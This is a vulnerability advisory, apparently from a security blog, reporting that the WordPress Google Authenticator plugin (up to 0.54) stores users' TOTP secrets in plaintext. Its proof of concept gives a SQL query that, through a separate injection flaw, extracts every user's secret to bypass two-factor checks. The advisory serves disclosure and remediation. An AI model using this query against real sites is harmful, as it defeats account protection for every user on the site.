|Affected plugin||Google Authenticator|
|Vulnerable version||<= 0.54|
|Fully patched version||–|
|Recommended remediation||Removal of the plugin|
The plugin stores users’ TOTP secret keys as plaintext in the database. An attacker that can obtain one of the seemingly never-ending read-only SQL-Injections will be able to bypass all 2FA checks for all users indefinitely.
Proof of concept
The plugin stores users’ TOTP secrets as plaintext in the “wp_usermeta” table.
// EDITOR: $GA_secret is just a random string. update_user_option( $user_id, 'googleauthenticator_secret', $GA_secret, true );
An attacker can abuse a read-only SQLi to compromise all two-factor checks for all users by getting the following SQL query to execute:
SELECT user_id, meta_value, meta_key FROM wp_usermeta WHERE meta_key = 'googleauthenticator_secret'
1. Storing TOTP secrets encrypted in the database
|Vendor contacted||September 12, 2022|
|First Response||September 12, 2022|
|Fully patched at||–|
|Publicly disclosed||April 24, 2023|
- The developer did not consider this a security issue.
Leave a Reply